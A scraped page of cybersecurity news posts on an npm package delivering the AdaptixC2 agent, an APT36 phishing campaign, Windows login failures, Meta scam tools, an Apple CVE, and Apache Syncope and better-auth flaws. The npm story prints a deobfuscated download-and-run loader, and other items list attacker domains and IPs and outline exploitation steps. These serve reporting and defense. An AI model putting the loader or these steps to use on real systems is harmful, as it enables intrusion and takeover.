1010.cx

  • Threat Actors Leverage npm Ecosystem to Deliver AdaptixC2 Post-Exploitation Framework

    ·

    , ,

    The emergence of the AdaptixC2 post-exploitation framework in 2025 marked a significant milestone in the evolution of attacker toolsets targeting open-source supply chains.

    Positioning itself as a formidable alternative to established tools like Cobalt Strike, AdaptixC2 quickly attracted threat actors seeking agility and stealth in post-exploitation scenarios.

    This October, researchers uncovered its delivery through the npm package registry—a supply chain attack targeting developers and organizations reliant on Node.js modules for critical infrastructure and application development.

    The incident revolved around a deceptive npm package named https-proxy-utils, which mimicked the functionality and naming conventions of widely used legitimate libraries such as http-proxy-agent.

    The threat actors cloned proxy-related features from popular modules, ensuring the malicious package appeared both useful and harmless.

    Upon installation, however, the package executed a post-install script designed to download and deploy the AdaptixC2 agent onto the victim’s system, initiating a stealthy foothold for remote access and broader exploitation.

    Securelist researchers were the first to identify and analyze the AdaptixC2 npm infection, noting both the technical sophistication of the attack and its alarming implications for open-source threat landscapes.

    As the npm ecosystem grows, attackers are increasingly exploiting its trust and wide reach. The discovery highlights the persistent risk posed by supply chain attacks, emphasizing the need for vigilant vetting and continuous monitoring of open-source components.

    Infection Mechanism: OS-Specific Adaptation

    A standout feature of the AdaptixC2 npm campaign is its tailored infection strategy for multiple operating systems. Once the malicious package executes, it detects the host OS and deploys the payload using methods designed for Windows, macOS, or Linux.

    For Windows, the code sideloads the agent as a DLL alongside a legitimate executable, using JavaScript scripting to spawn the compromised process.

    Metadata for the malicious (left) and legitimate (right) packages (Source – Securelist)

    Below is a deobfuscated snippet employed for Windows deployment:-

    async function onWindows() {
  const url = 'https://cloudcenter.topsysupdate';
  const dllPath = 'C:\\.dll';
  const systemMsdtc = 'C:\\32.exe';
  const tasksMsdtc = 'C:\\.exe';
  try {
    await downloadFile(url, dllPath);
    fs.copyFileSync(systemMsdtc, tasksMsdtc);
    const child = spawn(tasksMsdtc, [], { detached: true, stdio: 'ignore' });
    child.unref();
  } catch (err) {
    console.error(err);
  }
}

    This flexible approach extends across macOS and Linux systems, employing autorun configuration and architecture-specific binary delivery to ensure persistent control.

    Such OS-targeted infection routines deepen the framework’s ability to evade conventional detection, broadening its scope for exploitation across diverse environments.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post Threat Actors Leverage npm Ecosystem to Deliver AdaptixC2 Post-Exploitation Framework appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Pakistani Threat Actors Targeting Indian Govt. With Email Mimic as ‘NIC eEmail Services’

    ·

    , ,

    A sophisticated phishing campaign orchestrated by Pakistan-linked threat actors has been discovered targeting Indian government entities by impersonating the National Informatics Centre’s email services.

    The operation, attributed to APT36, also known as TransparentTribe, leverages social engineering tactics to compromise sensitive government infrastructure through deceptive email communications designed to appear as legitimate NIC eEmail Services correspondence.

    The campaign employs carefully crafted phishing lures that mimic official government communication channels, exploiting the trust associated with NIC’s established email infrastructure.

    By masquerading as authentic government correspondence, the threat actors aim to trick officials into divulging credentials or downloading malicious payloads.

    This targeting strategy demonstrates the group’s deep understanding of Indian government communication protocols and their continued focus on intelligence gathering operations against Indian administrative and defense sectors.

    Cyber Team analysts identified the malicious infrastructure supporting this campaign, uncovering a network of fraudulent domains and command-and-control servers designed to facilitate credential harvesting and data exfiltration.

    The operation represents a continuation of APT36’s long-standing espionage activities against Indian government targets, reflecting the group’s persistent interest in compromising sensitive governmental communications.

    Infrastructure and Technical Indicators

    The attack infrastructure reveals a multi-layered command-and-control framework centered around the fraudulent domain accounts.mgovcloud[.]in.departmentofdefence[.]live, which closely mimics legitimate government cloud services.

    The primary malicious domain departmentofdefence[.]live serves as the foundation for the phishing operation, while IP address 81.180.93[.]5 operates as a stealth server with C2 functionality accessible on port 8080.

    Additional infrastructure includes IP 45.141.59[.]168, providing redundancy and resilience to the adversary’s command-and-control network.

    This sophisticated setup enables the threat actors to maintain persistent access while evading detection through a distributed infrastructure that complicates attribution and takedown efforts.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post Pakistani Threat Actors Targeting Indian Govt. With Email Mimic as ‘NIC eEmail Services’ appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • How Threat Intelligence Can Save Money and Resources for Businesses

    ·

    ,

    Cybersecurity is not just about defense; it is about protecting profits. Organizations without modern threat intelligence (TI) face escalating breach costs, wasted resources, and operational inefficiencies that hit the bottom line.

    Actionable intel can help businesses cut costs, optimize workflows, and neutralize risks before they escalate.​

    Security operations centers (SOCs) suffer from inefficiency and burnout without high-fidelity TI. Analysts manually sift through thousands of alerts, many of which are false positives, wasting time and budgets while overlooking real threats.

    This reactive chaos leads to high turnover, with false positives costing enterprises up to $1.3 million annually in labor alone, and burnout making staff twice as likely to seek new jobs.​

    Undetected threats turn into financial disasters, exploiting visibility gaps and slow responses. Generic TI feeds often miss evasive attacks, allowing breaches to cause downtime, fines, and lost trust.

    The global average breach cost in 2025 is $4.44 million, with U.S. organizations facing $10.22 million, while nearly one in five small and medium-sized businesses (SMBs) could close after a successful attack.​

    Compliance gaps invite fines and legal risks, as regulators demand proactive threat documentation. Without real-time TI, audits reveal shortcomings, triggering penalties like GDPR’s up to 4% of global revenue or €20 million, and HIPAA violations exceeding $1.5 million per incident.​

    Five Strategies for Cost Savings with Threat Intelligence

    TI prevents breaches early through feeds providing real-time data on indicators of compromise (IOCs). ANY.RUN’s Threat Intelligence Feeds deliver actionable intel from over 15,000 SOC investigations, blocking threats at the source and avoiding multimillion-dollar recoveries.

    ​Preventing Breaches Proactively

    Threat intelligence (TI) stops breaches early by delivering real-time IOC feeds that integrate with firewalls and EDR tools for automated blocking of threats like malicious domains.

    Platforms such as ANY.RUN provides 24 times more IOCs from global SOC data, enabling quick risk isolation and reducing breach likelihood by up to 70% through predictive attacker insights.​

    Eliminating False Positive Waste

    TI filters alerts by enriching them with context on threat actors and TTPs, cutting investigation time on benign events and alleviating alert fatigue that wastes 30% of analyst hours.

    ANY.RUN’s TI Lookup prioritizes high-risk threats via SIEM integrations, saving up to 50% in labor by focusing teams on verified dangers rather than noise.​

    Cutting Labor Costs Through Automated Triage

    Automated TI triage uses APIs to connect with SOAR and EDR, providing instant sandbox context to reduce manual escalations and empower junior analysts.

    ANY.RUN’s SDK automates artifact enrichment, minimizing turnover and overtime while boosting SOC capacity by 20-30% without additional hires.​

    Accelerating Response to Limit Damage

    TI speeds incident response with full attack visibility from single IOCs, shortening MTTR by 40-60% through sandbox reports on malware behaviors.

    ANY.RUN’s feeds link to detailed analyses, enabling precise containment that cuts downtime costs—up to $100,000 per hour—and prevents revenue loss from prolonged incidents.​

    Maintaining Up-to-Date Defenses Effortlessly

    Continuous TI updates deliver real-time, 99% unique IOCs with MITRE ATT&CK mappings, automating adaptations to evolving threats like ransomware without manual effort.

    ANY.RUN’s query notifications keep defenses proactive, reducing breach risks by 50% and avoiding costs from outdated static feeds.​

    It eliminates false positive waste by filtering alerts for verified threats. ANY.RUN’s solutions cut noise, saving hours on triage and redirecting budgets to high-impact tasks, reducing alert fatigue that plagues teams.​

    Automated triage lowers labor costs via seamless integrations. ANY.RUN’s API and SDK connect with SIEM, SOAR, and EDR tools, enriching alerts instantly and minimizing escalations, thus avoiding overtime and hiring needs.​

    Faster responses minimize fallout, with TI providing full attack context from sandbox analyses. ANY.RUN’s TI Lookup offers instant IOC enrichment, shortening mean time to respond (MTTR) and limiting downtime losses.​

    Continuous updates future-proof defenses without manual effort. ANY.RUN’s feeds refresh in real time with 99% unique IOCs, integrating MITRE ATT&CK mappings to adapt to evolving threats proactively.​

    An international transport firm battled phishing and malware by adopting ANY.RUN’s TI Lookup for automated tracking of geo-targeted threats and CVEs.

    Custom queries and real-time updates enabled quick rule creation, slashing manual research and boosting detection speed. The result: blocked attacks preemptively, optimized resources, and enhanced proactive defenses against shifting attacker tactics.​

    Threat intelligence like ANY.RUN’s TI Feeds and Lookup transforms security from a cost center into a profit protector.

    Build Stronger Security With Fresh TI Data From 500,000 Analysts => Try Now

    The post How Threat Intelligence Can Save Money and Resources for Businesses appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Microsoft Confirms Recent Updates Cause Login Issues on Windows 11 24H2, 25H2, and Windows Server 2025

    ·

    , , ,

    Microsoft has acknowledged a significant authentication problem affecting users of recent Windows versions, stemming from security enhancements in updates released since late August 2025.

    The company detailed how these updates are triggering Kerberos and NTLM failures on devices sharing identical Security Identifiers (SIDs), leading to widespread login disruptions across enterprise networks.

    This issue, now officially documented, highlights the trade-offs between bolstering security and maintaining compatibility in cloned or duplicated systems.​

    Windows Operating Systems Affected

    Affected users on Windows 11 version 24H2, version 25H2, and Windows Server 2025 report a range of frustrating symptoms following the installation of updates like KB5064081 on August 29, 2025, and KB5065426 on September 9, 2025.

    Common issues include repeated credential prompts despite entering valid information, with error messages such as “Login attempt failed,” “Your credentials didn’t work,” or “There is a partial mismatch in the machine ID.”

    Network access breaks down as well, preventing connections to shared folders via IP or hostname and blocking Remote Desktop Protocol (RDP) sessions, even those routed through Privileged Access Management (PAM) tools or third-party software.

    Failover Clustering operations halt with “access denied” errors, complicating high-availability setups in data centers. Event Viewer logs reveal critical clues, including SEC_E_NO_CREDENTIALS in the Security log and Local Security Authority Server Service (lsasrv.dll) Event ID 6167 in the System log, signaling a machine ID mismatch that suggests ticket manipulation or session discrepancies.

    These problems have surfaced prominently in virtual desktop infrastructure (VDI) environments, such as those using Citrix MCS, where multiple machines derived from the same image share SIDs, exacerbating authentication breakdowns during RDP or file sharing.​

    At the heart of this disruption lies a deliberate security upgrade in the updates, which now rigorously verifies SIDs during authentication handshakes to prevent unauthorized access.

    Microsoft explains that duplicate SIDs, often resulting from improper cloning of Windows installations without the Sysprep tool, are no longer tolerated under this new regime.

    Sysprep ensures SID uniqueness, a requirement Microsoft has long recommended for duplicating OS images, but the August updates enforce it more stringently, blocking interactions between affected devices.

    This change aligns with Microsoft’s policy against unsupported disk duplication methods, which can propagate identical SIDs across networks, posing risks in enterprise settings.

    While intended to enhance protection against potential exploits, the enforcement has caught many IT teams off guard, particularly in scenarios involving rapid VM deployments or legacy imaging practices.​

    For immediate relief, IT administrators can deploy a specialized Group Policy to mitigate the authentication blocks, though this requires contacting Microsoft Support for business to obtain it.

    However, Microsoft suggests that the definitive solution involves rebuilding impacted devices using approved cloning procedures that incorporate Sysprep, ensuring each system generates a unique SID.

    Organizations relying on tools like VMware or Citrix for VDI provisioning may need to revise their workflows to comply, potentially delaying updates until imaging processes are updated.

    As of October 21, 2025, no broader patch has been rolled out, but Microsoft continues monitoring reports from affected users. ​

    Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

    The post Microsoft Confirms Recent Updates Cause Login Issues on Windows 11 24H2, 25H2, and Windows Server 2025 appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Meta Launches New Tools to Protect Messenger and WhatsApp Users from Scammers

    ·

    ,

    Meta announced innovative tools on Tuesday to shield users of Messenger and WhatsApp from scammers. The updates, revealed during Cybersecurity Awareness Month, aim to detect suspicious activity in real-time and empower users with better account protections.

    This comes as scammers increasingly target vulnerable groups, including older adults, through messaging apps and social platforms.

    Since the start of 2025, Meta’s teams have disrupted nearly 8 million accounts linked to global scam centers operating from regions like Myanmar, Laos, Cambodia, the UAE, and the Philippines.

    These networks exploit dating apps, social media, and crypto channels to deceive victims. The FBI’s 2024 Internet Crime Report highlighted the scale of the problem, noting that Americans over 60 lost $4.8 billion to fraud last year alone. Criminals often build trust to compromise accounts, then prey on contacts for further scams.

    Enhanced detection features are key to Meta’s response. On WhatsApp, a new warning now alerts users when sharing their screen during video calls with unknown contacts, a common tactic scammers use to extract sensitive details like bank information or verification codes.

    For Messenger, advanced AI-driven scam detection is in testing: it flags potentially fraudulent messages from new contacts, offers to review chats, and provides tips on blocking or reporting. Users receive details on common schemes and recommended actions if a scam is identified.

    Meta is also promoting passkeys across Facebook, Messenger, and WhatsApp for seamless, biometric logins using fingerprints, faces, or PINs, reducing reliance on vulnerable passwords.

    Security Checkup on Facebook and Instagram reviews settings and suggests updates, while WhatsApp’s Privacy Checkup helps users manage group invites and other privacy options.

    Beyond tools, Meta shared scam trends uncovered with Graphika researchers. Watch for fake home remodeling or debt relief sites luring seniors with phony government benefits via ads on Facebook and Google.

    Fraudulent “money recovery” services mimic the FBI’s IC3 site, while impostor customer support pages hijack brand comments to push refunds through DMs or forms.

    To stay safe, Meta advises caution with unsolicited messages never share personal or financial data and verifying issues through official channels.

    Families can assist by discussing red flags like urgency or secrecy, and resources from AARP’s Fraud Watch Network or the FTC offer reporting options.

    Meta is deepening collaborations, joining the National Elder Fraud Coordination Center alongside AARP, Amazon, Google, and others to tackle elder fraud through shared intelligence and investigations.

    As part of the Tech Against Scams Coalition, it recently dismantled scam-linked Facebook Groups with Match Group. Globally, initiatives include training Thai seniors on digital literacy and awareness campaigns in Europe and India featuring local creators.

    These efforts underscore Meta’s commitment to evolving defenses against cross-border threats, with ongoing updates to keep users ahead of scammers.

    Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

    The post Meta Launches New Tools to Protect Messenger and WhatsApp Users from Scammers appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Today’s D Brief: EU backs Ukraine peace talks; AUKUS, back on; AI in Europe; NNSA idles most staff; And a bit more.

    ·

    A swarm of Russian drones shut down the electric grid in parts of Ukraine Tuesday, leaving hundreds of thousands without power—a sign of more blackouts to come this winter. Russia has mounted attacks on civilian infrastructure since it first invaded Ukraine in 2022, and such strikes are expected to grow more frequent as temperatures drop in coming weeks and months. 

    What’s new: “Analysts and officials say that this year Moscow has shifted tactics, targeting specific regions and gas infrastructure,” AP reports

    European leaders back White House stance on Ukraine. Leaders from across Europe, including the European Union, Britain, France, Germany, and Ukraine, penned a joint statement Tuesday, calling for a ceasefire and more pressure on Russia’s economy. “We are all united in our desire for a just and lasting peace, deserved by the people of Ukraine. We strongly support President Trump’s position that the fighting should stop immediately, and that the current line of contact should be the starting point of negotiations,” leaders wrote in the statement issued by the British government. “We must ramp up the pressure on Russia’s economy and its defence industry, until Putin is ready to make peace.” Read the statement, here.

    Asia-Pacific

    AUKUS is back on after a monthslong review by the Pentagon sparked uncertainty. President Donald Trump, who earlier this year appeared not to know about the trilateral deal, assuaged concerns about the submarine deal’s future, saying U.S. production was “full steam ahead” during a meeting with Australian Prime Minister Anthony Albanese on Monday. “They’re building magnificent holding pads for the submarines. It’s going to be expensive. You wouldn’t believe the level of complexity and how expensive it is,” Trump said. Australia has committed billions of dollars for the deal and its alliance is considered critical for stability in the Indo-Pacific region. 

    Minerals deal. The White House and Australia also signed a critical minerals deal, agreeing to put up $1 billion together in the next six months, according to a White House summary of the deal. Albanese said Australia has $8.5 billion in the pipeline for the arrangement and about $50 billion in resources are estimated to be recovered, NBC reported

    The rare-earth minerals deal comes ahead of a fraught White House meeting with Chinese President Xi Jinping next week. On Oct. 9, China “announced sweeping new rare earth export controls on Thursday, tightening global access to critical raw materials required for computer chips and defense technology,” as the Washington Post put it. One day later, Trump responded with a threat to levy new 100-percent tariffs on Chinese goods, starting Nov. 1 “or earlier.” 

    Trump also threatened to cancel his meeting with Xi, which could be strained further by Taiwan discussions. But the president insisted to reporters that China wasn’t interested in invading Taiwan, but noted the topic would likely come up, Reuters reported. “China doesn't want to do that,” Trump said, per Politico. “We have the best of everything and nobody is going to mess with that…I think we'll end up with a very strong trade deal. Both of us will be happy.”

    Beijing: Hey, the US is spying on us. China accused the National Security Agency of hacking its sensitive systems that keep standard time for defense, finance, and telecommunications sectors. Read more, here

    Welcome to this Tuesday edition of The D Brief, a newsletter dedicated to developments affecting the future of U.S. national security, brought to you by Bradley Peniston and Lauren C. Williams. It’s more important than ever to stay informed, so thank you for reading. Share your tips and feedback here. And if you’re not already subscribed, you can do that here. This day in 1960 saw the maiden flight of the W2F-1, the prototype for the E-2 Hawkeye carrier-­based airborne early warning aircraft still in service today.

    AI in Europe

    Two European nations embrace AI governance to keep safe. The governments of Estonia and Ukraine are racing ahead to harness artificial intelligence, which they believe is crucial to building societies that can fend off Russian assaults—whether by missiles or denial-of-service attacks, Defense One’s Patrick Tucker reports

    “Estonia knows what it means to live on the digital frontline. AI gives us an advantage that size alone cannot. This is why we have an AI strategy for defense and a Force Transformation Command within the Estonian Defense Forces. With industry, startups, and the military working side by side, we move from idea to field faster,” Estonian Prime Minister Kristen Michal told an audience of international technology executives and government officials. “Russia’s war has made one thing clear: the side that can integrate technology faster has the advantage. Ukraine has shown it. So, while supporting them in every way, we also learn from them.” This means more than buying AI tools and services, he said: it means completely rethinking governmental structure and function. More details, here.

    Around the US

    NNSA furloughs most of its staff. The Trump administration furloughed 1,400 employees of the National Nuclear Security Administration on Monday as payroll funds ran out and the shutdown entered its third week. “About 400 NNSA employees will continue working without pay to secure the nuclear stockpile and maintain minimum safety conditions,” Federal News Network reported Monday. Energy Secretary Chris Wright: “This has never happened before.” Politico has background, here.

    Border relocation. House Democrats want to know why Homeland Security moved key cyber workers to the border. The Monday letter — led by Rep. James Walkinshaw, D-Va., and also signed by Reps. Suhas Subramanyam, D-Va., Eugene Vindman, D-Va., and Shontel Brown, D-Ohio, along with Del. Eleanor Holmes Norton, D-D.C. — argues that DHS violated the Antideficiency Act when it conducted a reduction in force during the government shutdown. The agency has also moved to reassign Cybersecurity and Infrastructure Security Agency staff to roles within Immigration and Customs Enforcement, the Federal Protective Service and Customs and Border Protection. Get the full story here.

    ICYMI: Many communications satellites don’t encrypt their traffic, study finds. Wired: “With just $800 in basic equipment, researchers found a stunning variety of data—including thousands of T-Mobile users’ calls and texts and even US military communications—sent by satellites unencrypted.” Read on, here.

    ]]>

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • CISA Warns of Apple macOS, iOS, tvOS, Safari, and watchOS Vulnerability Exploited in Attacks

    ·

    , , ,

    The Cybersecurity and Infrastructure Security Agency (CISA) has issued a high-priority alert about a critical vulnerability in multiple Apple products.

    Tracked as CVE-2022-48503, this unspecified issue in the JavaScriptCore engine could allow attackers to execute arbitrary code simply by processing malicious web content. The flaw affects macOS, iOS, tvOS, Safari, and watchOS, putting millions of users at risk of remote exploitation.

    First disclosed in 2022, the vulnerability has resurfaced in active attacks, according to CISA’s Known Exploited Vulnerabilities (KEV) catalog. Security researchers note that while Apple patched it in subsequent updates, unpatched or end-of-life (EoL) systems remain prime targets.

    “This isn’t just a relic of the past threat actors are weaponizing old bugs against outdated devices,” said a CISA spokesperson in the advisory.

    The agency emphasized that the vulnerability’s severity stems from its potential for full system compromise, enabling data theft, ransomware deployment, or further malware spread.

    Although no direct ties to ransomware campaigns have been confirmed, the unknown exploitation history underscores the urgency for immediate action.

    Widespread Impact on Apple’s Ecosystem

    The vulnerability’s broad reach spans Apple’s core operating systems and browser. JavaScriptCore, the engine powering Safari and other web rendering in iOS, macOS, tvOS, and watchOS, processes dynamic web elements like scripts and animations.

    An attacker could craft a booby-trapped webpage or email link to trigger the flaw, bypassing traditional defenses. Older devices, such as those running iOS 15 or earlier macOS versions, are particularly vulnerable if they haven’t received updates.

    CISA warns that end-of-service (EoS) products no longer supported by Apple offer no patch path, leaving users exposed indefinitely.

    For cloud-integrated services, CISA references Binding Operational Directive (BOD) 22-01, urging federal agencies and critical infrastructure operators to apply mitigations or retire affected systems.

    Private users face similar risks, especially in hybrid work environments where personal Apple devices handle sensitive data.

    CISA’s directive is clear: Update to the latest vendor-patched versions immediately. Apple released fixes in security updates dating back to early 2023, but users must verify their systems via Settings > General > Software Update.

    If mitigations aren’t feasible, particularly for EoL hardware, the agency advises discontinuing use to avoid exploitation. Network defenders should monitor for anomalous JavaScript activity and enforce endpoint detection rules targeting code execution attempts.

    Recent reports indicate that attacks on Apple platforms are surging by 20% year over year, making staying vigilant non-negotiable. Organizations delaying patches risk cascading breaches, while individuals should prioritize updates to safeguard their digital lives.

    Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

    The post CISA Warns of Apple macOS, iOS, tvOS, Safari, and watchOS Vulnerability Exploited in Attacks appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Meta Rolls Out New Tools to Protect WhatsApp and Messenger Users from Scams

    ·

    Meta on Tuesday said it’s launching new tools to protect Messenger and WhatsApp users from potential scams. To that end, the company said it’s introducing new warnings on WhatsApp when users attempt to share their screen with an unknown contact during a video call so as to prevent them from giving away sensitive information like bank details or verification codes. On Messenger, users can opt to

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Apache Syncope Groovy RCE Vulnerability Let Attackers Inject Malicious Code

    ·

    , ,

    Apache Syncope, an open-source identity management system, has been found vulnerable to remote code execution (RCE) through its Groovy scripting feature, as detailed in CVE-2025-57738.

    This flaw affects versions prior to 3.0.14 and 4.0.2, where administrators can upload malicious Groovy code that runs with the full privileges of the Syncope Core process.

    Discovered by security researcher Mike Cole of Mantel Group, the vulnerability stems from the lack of a sandbox environment for Groovy implementations, potentially allowing attackers to compromise entire systems.

    The issue arises because Syncope lets users extend its core functionality via custom Java interfaces, which can be implemented using either Java classes or Groovy scripts for hot-reloading at runtime.

    In vulnerable versions, the GroovyClassLoader compiles and executes these scripts without restrictions, exposing dangerous APIs like Runtime.exec or ProcessBuilder to untrusted input.

    This design choice enables delegated administrators with access to the Implementations and Reports APIs to inject code that performs arbitrary operations on the server.

    Apache Syncope Groovy RCE Vulnerability

    Syncope’s architecture includes an “Implementation” abstraction for custom logic, with Groovy as one supported engine type.

    Without a security manager or deny-list, uploaded Groovy code can directly invoke system-level functions, such as filesystem access or process spawning.

    For instance, attackers can create a Groovy implementation of type REPORT_DELEGATE, bind it to a report, and trigger execution via REST endpoints like POST /syncope/rest/reports/{key}/execute.

    This executes the code under the Syncope service account, which often runs with elevated privileges in enterprise deployments.

    Reproduction involves simple HTTP requests using basic authentication, such as uploading a script that touches a marker file in /tmp to prove execution.

    The vulnerability requires administrative entitlements but does not need pre-authentication, making it a high-risk insider or compromised account threat.

    Execution surfaces include reports, tasks, and connectors, broadening the application’s attack paths. If hardening is weak, attackers could inspect environment variables for secrets, write files, or pivot to container hosts.

    Mapped to MITRE ATT&CK, this aligns with tactics like Valid Accounts (T1078) and Command and Scripting Interpreter (T1059), enabling persistence and evasion.

    Apache has addressed the issue in releases 3.0.14 and 4.0.2 by introducing a Groovy sandbox that blocks hazardous operations through classloading restrictions and policy enforcement.

    Users should upgrade immediately, as binary patches are not provided, and rebuild from the source if needed. To verify the fix, attempt the same exploitation steps; sandbox violations should now log errors without executing code.syncope.

    Disable Groovy engines and favor vetted Java implementations via CI/CD pipelines for interim protection on vulnerable versions.

    Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

    The post Apache Syncope Groovy RCE Vulnerability Let Attackers Inject Malicious Code appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Better Auth API keys Vulnerability Let Attackers Create Privileged Credentials For Arbitrary Users

    ·

    , , ,

    A severe vulnerability in the popular better-auth library’s API keys plugin enables attackers to generate privileged credentials for any user without authentication.

    Dubbed CVE-2025-61928, the issue affects better-auth, a TypeScript authentication framework downloaded around 300,000 times weekly on npm.

    This flaw could lead to widespread account compromises, particularly for applications relying on API keys for automated access. Better-auth powers authentication for fast-growing startups and major enterprises, including energy giant Equinor.

    Its plugin architecture simplifies adding features like API key management, but a subtle bug in the authorization logic opened the door to exploitation.

    ZeroPath uncovered the vulnerability during scans of third-party dependencies, highlighting risks in authentication libraries that underpin entire application ecosystems.

    Better Auth API Keys Vulnerability

    The problem lies in the createApiKey handler within the plugin. Normally, it derives user context from an active session to enforce security checks.

    However, when a request lacks a session but includes a userId in the body, the code sets an “authRequired” flag to false. This skips critical validations, allowing the handler to fabricate a user object from attacker-supplied data.

    As a result, unauthenticated attackers can POST to the /api/auth/api-key/create endpoint with a target user’s ID, name, and optional privileged fields like rate limits or permissions.

    The response returns a valid API key tied to the victim’s account, bypassing multi-factor authentication and enabling scripted takeovers. The same logic affects update endpoints, amplifying the risk.

    API keys often grant long-lived, elevated privileges for automation, making this vulnerability particularly dangerous. Attackers could impersonate users, access sensitive data, or automate malicious actions across services.

    Only deployments with the API keys plugin are impacted, but given better-auth’s adoption, exposure is significant. To mitigate, upgrade immediately to better-auth version 1.3.26 or later, which fixes the authorization check.

    Rotate all API keys created via the plugin, invalidate unused ones, and audit logs for suspicious unauthenticated requests to create or update endpoints, especially those setting userId or high-privilege values.

    The maintainers patched it swiftly after disclosure on October 2. The advisory (GHSA-99h5-pjcv-gr6v) was published on October 8 via GitHub, and the CVE was assigned the next day.

    Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

    The post Better Auth API keys Vulnerability Let Attackers Create Privileged Credentials For Arbitrary Users appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶